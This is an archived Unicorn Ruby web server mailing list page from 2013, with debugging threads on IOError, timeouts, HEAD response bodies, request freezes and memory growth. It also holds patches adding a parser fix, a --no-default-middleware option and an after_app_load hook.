  @ 2013-09-24 17:39  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-09-24 17:39 UTC (permalink / raw)
  To: unicorn list

David Judd <david@academia.edu> wrote:
> I'm getting "IOError: closed stream" from inside Unicorn occasionally
> and I don't know what to make of it. The stack trace looks like this:
> 
> unicorn (4.5.0) lib/unicorn/stream_input.rb:129:in `kgio_read' unicorn
> (4.5.0) lib/unicorn/stream_input.rb:129:in `read_all' unicorn (4.5.0)
> lib/unicorn/stream_input.rb:60:in `read' unicorn (4.5.0)
> lib/unicorn/tee_input.rb:84:in `read'
> config/initializers/rack_request.rb:19:in `POST' rack (1.4.5)
> lib/rack/request.rb:221:in `params'
> 
> Any suggestions what this might indicate? Is this what I should
> legitimately expect to see if the browser closes the connection
> abruptly?

Not a client closing the connection, that would be EOFError,
Errno::ECONNRESET or another Errno::...

IOError means something in the unicorn process closed the connection
already, which should not happen there.

Do you have anything in your Rack app which does background processing
of rack.input after the response is written?

That would be the most likely explanation...

> It's happening only for POSTs, and a small percentage of them, but I
> can't find any further pattern - a variety of content, usually quite
> small content-lengths.
> 
> Currently we're running nginx in front of unicorn via a unix socket.
> In this state the errors occur at an almost-negligible rate. I
> experimented yesterday with moving instead to nginx in front of
> varnish, on a separate machine, with varnish then talking to unicorn
> via a TCP socket. In that configuration the errors increased
> dramatically, although the majority of requests still succeeded.

If varnish is used, your nginx -> varnish -> unicorn is what I would
recommend (not that I have much experience with varnish, but I when I
last looked at them, nginx was better at handling slow/idle
connections).

That said, I'm not sure what could cause the increase in errors...
Is varnish attempting to pre-connect?

Can you reproduce this error on a minimal Rack app from a client
you control?

> As you can see we're running unicorn 4.5 and rack 1.4.5 - except that
> I'm monkey-patching Rack::Request to backport the 1.5 POST method,
> which transforms an earlier nil error in to this one. (On Ruby 2.0.0,
> on an Ubuntu-precise box on AWS.)

For the mimimal rack test app, try just an unpatched Rack,
there could be a subtle compatibility problems from the monkey patch.

The basic idea is to eliminate variables and strange/uncommon things to
pinpoint the problem.

> Any relevant info or suggestions would be appreciated.

Since you're on 4.5, it would not be via rack.hijack ...

I'm not ruling out a bug in unicorn, but I don't think we've heard of
this problem before.  The code for handling rack.input hasn't been
changed much, either.  I beat the crap out of it, but usually for PUT
requests (but not using POST in Rack::Request).

> Apologies if this shows up as a double-post--my first attempt seems to
> have been rejected because I didn't turn on plain text mode.

Only saw this one.  You can check on gmane.comp.lang.ruby.unicorn.general
or http://rubyforge.org/pipermail/mongrel-unicorn
Mailman should be converting HTML to plain-text, but maybe it fails
sometimes...  I'd rather deal with an occasional double post than every
message being 2-3 times bigger due to HTML.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: A barrage of unexplained timeouts
  2013-08-20 21:32  4%                 ` Eric Wong
@ 2013-08-21 13:33  0%                   ` nick
  0 siblings, 0 replies; 200+ results
From: nick @ 2013-08-21 13:33 UTC (permalink / raw)
  To: unicorn list

"Eric Wong" <normalperson@yhbt.net> said:
> nick@auger.net wrote:
>> "Eric Wong" <normalperson@yhbt.net> said:
>> > nick@auger.net wrote:
>> >> "Eric Wong" <normalperson@yhbt.net> said:
>> > I'm stumped :<
>>
>> I was afraid you'd say that :(.
> 
> Actually, another potential issue is DNS lookups timing out.  But they
> shouldn't take *that* long...
> 
>> > Do you have any background threads running that could be hanging the
>> > workers?   This is Ruby 1.8, after all, so there's more likely to be
>> > some blocking call hanging the entire process.  AFAIK, some monitoring
>> > software runs a background thread in the unicorn worker and maybe the
>> > OpenSSL extension doesn't work as well if it encountered network
>> > problems under Ruby 1.8
>>
>> We don't explicitly create any threads in our rails code.  We do
>> communicate with backgroundrb worker processes, although, none of the
>> strangeness today involved any routes that would hit backgroundrb
>> workers.
> 
> I proactively audit every piece of code (including external
> libraries/gems) loaded by an app for potentially blocking calls (hits to
> the filesystem, socket calls w/o timeout/blocking).   I use strace to
> help me find that sometimes...
> 
>> Is there any instrumentation that I could add that might help
>> debugging in the future? ($request_time and $upstream_response_time
>> are now in my nginx logs.)  We have noticed these "unexplainable
>> timeouts" before, but typically for a single worker.  If there's some
>> debugging that could be added I might be able to track it down during
>> these one-off events.
> 
> As an experiment, can you replay traffic a few minutes leading up to and
> including that 7m period in a test setup with only one straced worker?

I've replayed this in a development environment without triggering the issue.  Lack of POST payloads and slight differences between the two environments, make this difficult to test.

> Run "strace -T -f -o $FILE -p $PID_OF_WORKER" and see if there's any
> unexpected/surprising dependencies (connect() to unrecognized addresses,
> open() to networked filesystems, fcntl locks, etc...).
> 
> You can play around with some other strace options (-v/-s SIZE/-e filters)

I'll do my best to look at the output for anything out of the ordinary.  Unfortunately, strace is a new tool for me and is a bit out of my wheelhouse.


_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: A barrage of unexplained timeouts
  @ 2013-08-20 21:32  4%                 ` Eric Wong
  2013-08-21 13:33  0%                   ` nick
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-08-20 21:32 UTC (permalink / raw)
  To: unicorn list

nick@auger.net wrote:
> "Eric Wong" <normalperson@yhbt.net> said:
> > nick@auger.net wrote:
> >> "Eric Wong" <normalperson@yhbt.net> said:
> > I'm stumped :<
> 
> I was afraid you'd say that :(.

Actually, another potential issue is DNS lookups timing out.  But they
shouldn't take *that* long...

> > Do you have any background threads running that could be hanging the
> > workers?   This is Ruby 1.8, after all, so there's more likely to be
> > some blocking call hanging the entire process.  AFAIK, some monitoring
> > software runs a background thread in the unicorn worker and maybe the
> > OpenSSL extension doesn't work as well if it encountered network
> > problems under Ruby 1.8
> 
> We don't explicitly create any threads in our rails code.  We do
> communicate with backgroundrb worker processes, although, none of the
> strangeness today involved any routes that would hit backgroundrb
> workers.

I proactively audit every piece of code (including external
libraries/gems) loaded by an app for potentially blocking calls (hits to
the filesystem, socket calls w/o timeout/blocking).   I use strace to
help me find that sometimes...

> Is there any instrumentation that I could add that might help
> debugging in the future? ($request_time and $upstream_response_time
> are now in my nginx logs.)  We have noticed these "unexplainable
> timeouts" before, but typically for a single worker.  If there's some
> debugging that could be added I might be able to track it down during
> these one-off events.

As an experiment, can you replay traffic a few minutes leading up to and
including that 7m period in a test setup with only one straced worker?

Run "strace -T -f -o $FILE -p $PID_OF_WORKER" and see if there's any
unexpected/surprising dependencies (connect() to unrecognized addresses,
open() to networked filesystems, fcntl locks, etc...).

You can play around with some other strace options (-v/-s SIZE/-e filters)

Maybe you'll find something, there.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: HEAD responses contain body
  2013-06-13 19:28  0%       ` Jonathan Rudenberg
@ 2013-06-13 19:34  0%         ` Jonathan Rudenberg
  0 siblings, 0 replies; 200+ results
From: Jonathan Rudenberg @ 2013-06-13 19:34 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list


On Jun 13, 2013, at 3:28 PM, Jonathan Rudenberg <jonathan@titanous.com> wrote:

> 
> On Jun 13, 2013, at 3:21 PM, Eric Wong <normalperson@yhbt.net> wrote:
> 
>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
>>>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>>>> RFC 2616 section 9.4[1] states:
>>>>> 
>>>>>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
>>>>> 
>>>>> A HEAD request against this simple Rack app running on unicorn-4.6.2:
>>>>> 
>>>>>  require 'rack'
>>>>> 
>>>> 
>>>> +     use Rack::Head
>>>> 
>>>>>  run lambda { |env| [200, {}, []] }
>>>> 
>>>> The Rack::Head middleware should be used to correctly strip HEAD
>>>> responses of their bodies (frameworks such as Rails/Sinatra should
>>>> already add Rack::Head to the middleware stack for you)
>>> 
>>> This does not change the result, as the Rack::Head implementation looks like this:
>>> 
>>>   def call(env)
>>>     status, headers, body = @app.call(env)
>>> 
>>>     if env["REQUEST_METHOD"] == "HEAD"
>>>       body.close if body.respond_to? :close
>>>       [status, headers, []]
>>>     else
>>>       [status, headers, body]
>>>     end
>>>   end
>> 
>> OK, I think you were hitting another problem because you were lacking
>> Rack::ContentType
>> 
>> Try the following:
>> -----------------------8<---------------------
>> require 'rack'
>> use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
>> use Rack::Head
>> use Rack::ContentType
>> run lambda { |env| [200, {}, []] }
>> -----------------------8<---------------------
> 
> Thanks, this stack works.
> 
>> I added the Rack::ContentLength (it's already in the default middleware
>> stack) since I believe Rack::Chunked adding the '0' is a violation of
>> rfc2616... I'll need to read more closely to be sure.
> 
> Hmm, so this is a bug in Rack::Chunked? My reading of the spec says that the '0' is incorrect.

Actually, the solution is that Rack::Head needs to come before Rack::Chunked. Perhaps Rack's default development stack should include this?

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: HEAD responses contain body
  @ 2013-06-13 19:21  4%     ` Eric Wong
  2013-06-13 19:28  0%       ` Jonathan Rudenberg
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2013-06-13 19:21 UTC (permalink / raw)
  To: Jonathan Rudenberg; +Cc: unicorn list

Jonathan Rudenberg <jonathan@titanous.com> wrote:
> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
> > Jonathan Rudenberg <jonathan@titanous.com> wrote:
> >> RFC 2616 section 9.4[1] states:
> >> 
> >>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
> >> 
> >> A HEAD request against this simple Rack app running on unicorn-4.6.2:
> >> 
> >>    require 'rack'
> >> 
> > 
> > +     use Rack::Head
> > 
> >>    run lambda { |env| [200, {}, []] }
> > 
> > The Rack::Head middleware should be used to correctly strip HEAD
> > responses of their bodies (frameworks such as Rails/Sinatra should
> > already add Rack::Head to the middleware stack for you)
> 
> This does not change the result, as the Rack::Head implementation looks like this:
> 
>     def call(env)
>       status, headers, body = @app.call(env)
> 
>       if env["REQUEST_METHOD"] == "HEAD"
>         body.close if body.respond_to? :close
>         [status, headers, []]
>       else
>         [status, headers, body]
>       end
>     end

OK, I think you were hitting another problem because you were lacking
Rack::ContentType

Try the following:
-----------------------8<---------------------
require 'rack'
use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
use Rack::Head
use Rack::ContentType
run lambda { |env| [200, {}, []] }
-----------------------8<---------------------

I added the Rack::ContentLength (it's already in the default middleware
stack) since I believe Rack::Chunked adding the '0' is a violation of
rfc2616... I'll need to read more closely to be sure.

> >>    HTTP/1.1 500 Internal Server Error
> > 
> >> As you can see, not only is there a zero-length chunked encoding body,
> >> but for some unknown reason there is a 500 response with no body as
> >> well.
> > 
> > Try using "-d" on the command-line to enable debugging to see what the
> > error is (and check the logs/stderr output).
> 
>     Exception `Errno::ENOTCONN' at /Users/titanous/.gem/ruby/1.9.3/gems/unicorn-4.6.2/lib/unicorn/http_server.rb:565 - Socket is not connected

Ugh, that's an unfortunate side effect of the client closing the
connection, first :/

> > Also, what RACK_ENV (or -E/--env) are you using?  It could be the
> > incorrect HEAD response tripping Rack::Lint under development mode.
> 
> None, specified, I'm booting unicorn with no configuration or flags specified.

That defaults the RACK_ENV to to "development", so you got
Rack::ContentLength, Rack::Chunked, Rack::CommonLogger,
Rack::ShowExceptions and Rack::Lint
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: HEAD responses contain body
  2013-06-13 19:21  4%     ` Eric Wong
@ 2013-06-13 19:28  0%       ` Jonathan Rudenberg
  2013-06-13 19:34  0%         ` Jonathan Rudenberg
  0 siblings, 1 reply; 200+ results
From: Jonathan Rudenberg @ 2013-06-13 19:28 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list


On Jun 13, 2013, at 3:21 PM, Eric Wong <normalperson@yhbt.net> wrote:

> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>> On Jun 13, 2013, at 2:22 PM, Eric Wong <normalperson@yhbt.net> wrote:
>>> Jonathan Rudenberg <jonathan@titanous.com> wrote:
>>>> RFC 2616 section 9.4[1] states:
>>>> 
>>>>> The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response.
>>>> 
>>>> A HEAD request against this simple Rack app running on unicorn-4.6.2:
>>>> 
>>>>   require 'rack'
>>>> 
>>> 
>>> +     use Rack::Head
>>> 
>>>>   run lambda { |env| [200, {}, []] }
>>> 
>>> The Rack::Head middleware should be used to correctly strip HEAD
>>> responses of their bodies (frameworks such as Rails/Sinatra should
>>> already add Rack::Head to the middleware stack for you)
>> 
>> This does not change the result, as the Rack::Head implementation looks like this:
>> 
>>    def call(env)
>>      status, headers, body = @app.call(env)
>> 
>>      if env["REQUEST_METHOD"] == "HEAD"
>>        body.close if body.respond_to? :close
>>        [status, headers, []]
>>      else
>>        [status, headers, body]
>>      end
>>    end
> 
> OK, I think you were hitting another problem because you were lacking
> Rack::ContentType
> 
> Try the following:
> -----------------------8<---------------------
> require 'rack'
> use Rack::ContentLength # less ambiguous than Rack::Chunked adding '0'
> use Rack::Head
> use Rack::ContentType
> run lambda { |env| [200, {}, []] }
> -----------------------8<---------------------

Thanks, this stack works.

> I added the Rack::ContentLength (it's already in the default middleware
> stack) since I believe Rack::Chunked adding the '0' is a violation of
> rfc2616... I'll need to read more closely to be sure.

Hmm, so this is a bug in Rack::Chunked? My reading of the spec says that the '0' is incorrect.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Unicorn freezes, requests got stuck in the queue most likely
  2013-05-28 11:17  4% Unicorn freezes, requests got stuck in the queue most likely Alexander Dymo
@ 2013-05-28 17:20  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-28 17:20 UTC (permalink / raw)
  To: unicorn list; +Cc: Gleb Arshinov

Alexander Dymo <adymo@pluron.com> wrote:
> In short:
> - we have two groups of workers:
>   - one serving long-running requests that take more than 10 sec, listening to a '/tmp/long_requests_unicorn.sock' socket
>   - another serving normal requests, listening to '/tmp/unicorn.sock' socket
> - nginx determines which request goes to which sockets.
> 
> This worked perfectly for 2 years. Looks like after we upgraded to
> unicorn 4.4, the normal requests started to get stuck in the queue.
> That happens randomly, several times per day. When that happens,
> requests wait for up to 7 seconds to be served. At that time most or
> all of the workers are available and not doing anything. Unicorn
> restart fixes the problem.

How are you determining requests get stuck for up to 7 seconds?
Just hitting the app?

How is the system (CPU/RAM/swap usage) around this time?

Are you using Raindrops::LastDataRecv or Raindrops::Watcher?
(If not and you're on Linux, please give them a try[1]).

Anything in the stderr logs?  Dying/restarted workers might cause
this.  Otherwise, I'd look for unexpected long-running requests
in your Rails logs.

> Has anyone seen something freezes like that? I'd appreciate any help
> with debugging and understanding this problem.

I certainly have not.  Did you perform any other upgrades around this
point?

Can you try reverting to 4.3.1 (or earlier, and not changing anything else)
and see if the problem presents itself there?

Also, which OS/version is this?


[1] http://raindrops.bogomips.org/
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Unicorn freezes, requests got stuck in the queue most likely
@ 2013-05-28 11:17  4% Alexander Dymo
  2013-05-28 17:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alexander Dymo @ 2013-05-28 11:17 UTC (permalink / raw)
  To: unicorn list; +Cc: Gleb Arshinov

Hi,

I'd appreciate an advice on how to debug the following problem: unicorn sometimes freezes for 6-7 seconds and stops taking new requests, then resumes as if nothing happened. Details below.

My setup:
- nginx 0.7.67 proxying requests to unicorn
- unicorn 4.4.0
- rails 2.3.x application

Unicorn is set up as I've described in this list earlier:
http://rubyforge.org/pipermail/mongrel-unicorn/2010-November/000770.html

In short:
- we have two groups of workers:
   - one serving long-running requests that take more than 10 sec, listening to a '/tmp/long_requests_unicorn.sock' socket
   - another serving normal requests, listening to '/tmp/unicorn.sock' socket
- nginx determines which request goes to which sockets.

This worked perfectly for 2 years. Looks like after we upgraded to unicorn 4.4, the normal requests started to get stuck in the queue. That happens randomly, several times per day. When that happens, requests wait for up to 7 seconds to be served. At that time most or all of the workers are available and not doing anything. Unicorn restart fixes the problem.

Has anyone seen something freezes like that? I'd appreciate any help with debugging and understanding this problem.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* Re: Growing memory use of master process
  2013-05-15  8:52  4% Growing memory use of master process Andrew Stewart
@ 2013-05-15  9:28  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-15  9:28 UTC (permalink / raw)
  To: unicorn list

Andrew Stewart <boss@airbladesoftware.com> wrote:
> I was wondering why my Unicorn master process's memory use grows over
> time.
> 
> As as I understand it, when I (re)start Unicorn a master process spins
> up which loads my Rails app.  The master process then brings up worker
> processes which handle traffic to the app.

Correct, the master should not grow.  If you're using "preload_app true",
can you reproduce the growth without it?

> As time passes I'm not surprised to see the workers use more memory:
> Ruby 1.9's garbage collector doesn't free as much memory as it could and
> it's not inconceivable that my code is somewhat relaxed about creating
> objects.
> 
> However if the workers are handling the traffic, why does the master
> process's footprint grow?  Is it simply the inefficient garbage
> collector or is there another reason which, hopefully, I could address?

If you're using preload_app, I suspect it's some background thread
or hook causing it.  Otherwise, can you reproduce this with a barebones
application?
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Growing memory use of master process
@ 2013-05-15  8:52  4% Andrew Stewart
  2013-05-15  9:28  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andrew Stewart @ 2013-05-15  8:52 UTC (permalink / raw)
  To: mongrel-unicorn

Hello,

I was wondering why my Unicorn master process's memory use grows over
time.

As as I understand it, when I (re)start Unicorn a master process spins
up which loads my Rails app.  The master process then brings up worker
processes which handle traffic to the app.

As time passes I'm not surprised to see the workers use more memory:
Ruby 1.9's garbage collector doesn't free as much memory as it could and
it's not inconceivable that my code is somewhat relaxed about creating
objects.

However if the workers are handling the traffic, why does the master
process's footprint grow?  Is it simply the inefficient garbage
collector or is there another reason which, hopefully, I could address?

Thanks in advance.

Yours,
Andy Stewart

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 4%]

* [PATCH] HttpParser#next? becomes response_start_sent-aware
@ 2013-05-08 23:01  9% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-05-08 23:01 UTC (permalink / raw)
  To: mongrel-unicorn

This could allow servers with persistent connection support[1]
to support our check_client_connection in the future.

[1] - Rainbows!/zbatery, possibly others
---
 ext/unicorn_http/unicorn_http.rl |  6 ++----
 test/unit/test_http_parser_ng.rb | 17 +++++++++++++++++
 2 files changed, 19 insertions(+), 4 deletions(-)

diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 1a8003f..3529740 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -732,10 +732,8 @@ static VALUE HttpParser_parse(VALUE self)
   struct http_parser *hp = data_get(self);
   VALUE data = hp->buf;
 
-  if (HP_FL_TEST(hp, TO_CLEAR)) {
-    http_parser_init(hp);
-    rb_funcall(hp->env, id_clear, 0);
-  }
+  if (HP_FL_TEST(hp, TO_CLEAR))
+    HttpParser_clear(self);
 
   http_parser_execute(hp, RSTRING_PTR(data), RSTRING_LEN(data));
   if (hp->offset > MAX_HEADER_LEN)
diff --git a/test/unit/test_http_parser_ng.rb b/test/unit/test_http_parser_ng.rb
index 93c44bb..ab335ac 100644
--- a/test/unit/test_http_parser_ng.rb
+++ b/test/unit/test_http_parser_ng.rb
@@ -12,6 +12,23 @@ def setup
     @parser = HttpParser.new
   end
 
+  def test_next_clear
+    r = "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
+    @parser.buf << r
+    @parser.parse
+    @parser.response_start_sent = true
+    assert @parser.keepalive?
+    assert @parser.next?
+    assert @parser.response_start_sent
+
+    # persistent client makes another request:
+    @parser.buf << r
+    @parser.parse
+    assert @parser.keepalive?
+    assert @parser.next?
+    assert_equal false, @parser.response_start_sent
+  end
+
   def test_keepalive_requests_default_constant
     assert_kind_of Integer, HttpParser::KEEPALIVE_REQUESTS_DEFAULT
     assert HttpParser::KEEPALIVE_REQUESTS_DEFAULT >= 0
-- 
Eric Wong
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 9%]

* [PATCH] Add -N or --no-default-middleware option.
@ 2013-01-29  3:21  3% Lin Jen-Shin
  0 siblings, 0 replies; 200+ results
From: Lin Jen-Shin @ 2013-01-29  3:21 UTC (permalink / raw)
  To: mongrel-unicorn; +Cc: Lin Jen-Shin

This would prevent Unicorn from adding default middleware,
as if RACK_ENV were always none. (not development nor deployment)

This should also be applied to `rainbows' and `zbatery' as well.

One of the reasons to add this is to avoid conflicting
RAILS_ENV and RACK_ENV. It would be helpful in the case
where a Rails application and Rack application are composed
together, while we want Rails app runs under development
and Rack app runs under none (if we don't want those default
middleware), and we don't really want to make RAILS_ENV
set to development and RACK_ENV to none because it might be
confusing. Note that Rails would also look into RACK_ENV.

Another reason for this is that only `rackup' would be
inserting those default middleware. Both `thin' and `puma'
would not do this, nor does Rack::Handler.get.run which is
used in Sinatra.

So using this option would make it work differently from
`rackup' but somehow more similar to `thin' or `puma'.

Discussion thread on the mailing list:
http://rubyforge.org/pipermail/mongrel-unicorn/2013-January/001675.html
---
 bin/unicorn    | 5 +++++
 lib/unicorn.rb | 2 ++
 2 files changed, 7 insertions(+)

diff --git a/bin/unicorn b/bin/unicorn
index 9962b58..415d164 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -58,6 +58,11 @@ op = OptionParser.new("", 24, '  ') do |opts|
     ENV["RACK_ENV"] = e
   end
 
+  opts.on("-N", "--no-default-middleware",
+          "no default middleware even if RACK_ENV is development") do |e|
+    rackup_opts[:no_default_middleware] = true
+  end
+
   opts.on("-D", "--daemonize", "run daemonized in the background") do |d|
     rackup_opts[:daemonize] = !!d
   end
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index d96ff91..f0ceffe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -49,6 +49,8 @@ module Unicorn
 
       pp({ :inner_app => inner_app }) if $DEBUG
 
+      return inner_app if op[:no_default_middleware]
+
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
       # and Zbatery both do.  Users accustomed to the Rack::Server default
-- 
1.8.1.1

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 3%]

* Re: No middleware without touching RACK_ENV
  2013-01-25 10:52  2% No middleware without touching RACK_ENV Lin Jen-Shin (godfat)
@ 2013-01-25 18:39  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-01-25 18:39 UTC (permalink / raw)
  To: unicorn list

"Lin Jen-Shin (godfat)" <godfat@godfat.org> wrote:
> Hi,
> 
> This might be a bit silly, but finally I decided to bring this up.
> 
> We're running a Rails app along with another Rack app in
> the same config.ru, and what I want to do is telling Unicorn
> that we don't want any middleware which Unicorn might
> insert with RACK_ENV=development and RACK_ENV=
> deployment, because we're adding Rack::CommonLogger
> and other middleware by ourselves, while we're using
> RACK_ENV=development for Rails when developing.

Doesn't Rails favor RAILS_ENV over RACK_ENV?  unicorn ignores RAILS_ENV
(unicorn_rails respects RAILS_ENV, but unicorn_rails isn't recommended
for modern (Rack-enabled) Rails)

> That is, we want to use RACK_ENV=development for Rails
> because that's how it used to be, but we also don't want
> those additional middleware got inserted automatically.
> This has no problem with RACK_ENV=production.

Is there a benefit which RACK_ENV=development gives you for Rails
that RAILS_ENV=development does not give you?

Fwiw, the times I worked on Rails, I used customized dev environments
anyways, so I would use RAILS_ENV=dev_local or RAILS_ENV=dev_$NETWORK
for switching between a localhost-only vs networked setup.

> I know this is somehow a spec from Rack, but I guess I
> don't like this behaviour. One workaround would be
> providing a `after_app_load' hook, and we add this to
> the bottom of config.ru:
> 
>   ENV['RACK_ENV_ORIGINAL'] = ENV['RACK_ENV']
>   ENV['RACK_ENV'] = 'none'
> 
> and add this to the unicorn configuration file:
> 
>   after_app_load do |_|
>     ENV['RACK_ENV'] = ENV['RACK_ENV_ORIGINAL']
>   end
> 
> This is probably a stupid hack, but I wonder if after_app_load
> hook would be useful for other cases?

I don't see how this hook has benefits over putting this in config.ru
(or somewhere else in your app, since your app is already loaded...)

I'd imagine users wanting the same app-wide settings going between
different application servers, too.

> Or if we could have an option to turn off this Rack behaviour
> simulation, like:
> 
>     default_middleware false
> 
> That might be more straightforward for what we want. Oh but
> it seems it's not that easy to add this. What about an option
> for unicorn?
> 
>     unicorn -E development -N
> 
> or
> 
>     unicorn -E development --no-default-middleware

I'm against adding more command-line or config options, especially
around loading middleware.  RACK_ENV is already a source of confusion,
and Rails also has/(or had?) it's own middleware loading scheme
independent of config.ru.

> This would need to be applied to `rainbows' and `zbatery', too,
> though. Patches below for consideration:
> (Sorry if Gmail messed the format up, but from last time
> I tried, it doesn't accept attachments :( What's the best way?
> Links to raw patches?)

git format-patch + git send-email is the recommended way if your
mail client cannot be taught to leave formatting alone.  Also this
is easy for sending multiple patches in the same thread.

git format-patch --stdout with a good mail client which will not wrap
messages is also great (especially for single patches).

Attachments (generated using git format-patch) for text/x-diff should be
accepted by Mailman.  Attached patches are a last resort, I prefer
inline patches since I can quote/reply to them inline.

(same patch submission guidelines as git or Linux kernel)

> https://github.com/godfat/unicorn/pull/2
> 
> commit 95de5abf38a81a76af15476d4705713d2d644664
> Author: Lin Jen-Shin <godfat@godfat.org>
> Date:   Fri Jan 25 18:18:21 2013 +0800
> 
>     Add `after_app_load' hook.
> 
>     The hook would be called right after application is loaded.

Commit messages should explain why a change is made/needed, not just
what it does.
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* No middleware without touching RACK_ENV
@ 2013-01-25 10:52  2% Lin Jen-Shin (godfat)
  2013-01-25 18:39  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Lin Jen-Shin (godfat) @ 2013-01-25 10:52 UTC (permalink / raw)
  To: unicorn list

Hi,

This might be a bit silly, but finally I decided to bring this up.

We're running a Rails app along with another Rack app in
the same config.ru, and what I want to do is telling Unicorn
that we don't want any middleware which Unicorn might
insert with RACK_ENV=development and RACK_ENV=
deployment, because we're adding Rack::CommonLogger
and other middleware by ourselves, while we're using
RACK_ENV=development for Rails when developing.

That is, we want to use RACK_ENV=development for Rails
because that's how it used to be, but we also don't want
those additional middleware got inserted automatically.
This has no problem with RACK_ENV=production.

I know this is somehow a spec from Rack, but I guess I
don't like this behaviour. One workaround would be
providing a `after_app_load' hook, and we add this to
the bottom of config.ru:

  ENV['RACK_ENV_ORIGINAL'] = ENV['RACK_ENV']
  ENV['RACK_ENV'] = 'none'

and add this to the unicorn configuration file:

  after_app_load do |_|
    ENV['RACK_ENV'] = ENV['RACK_ENV_ORIGINAL']
  end

This is probably a stupid hack, but I wonder if after_app_load
hook would be useful for other cases?

Or if we could have an option to turn off this Rack behaviour
simulation, like:

    default_middleware false

That might be more straightforward for what we want. Oh but
it seems it's not that easy to add this. What about an option
for unicorn?

    unicorn -E development -N

or

    unicorn -E development --no-default-middleware

This would need to be applied to `rainbows' and `zbatery', too,
though. Patches below for consideration:
(Sorry if Gmail messed the format up, but from last time
I tried, it doesn't accept attachments :( What's the best way?
Links to raw patches?)

https://github.com/godfat/unicorn/pull/2

commit 95de5abf38a81a76af15476d4705713d2d644664
Author: Lin Jen-Shin <godfat@godfat.org>
Date:   Fri Jan 25 18:18:21 2013 +0800

    Add `after_app_load' hook.

    The hook would be called right after application is loaded.

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 7651093..332bdbc 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -43,6 +43,9 @@ class Unicorn::Configurator
     :before_exec => lambda { |server|
         server.logger.info("forked child re-executing...")
       },
+    :after_app_load => lambda { |server|
+        server.logger.info("application loaded")
+      },
     :pid => nil,
     :preload_app => false,
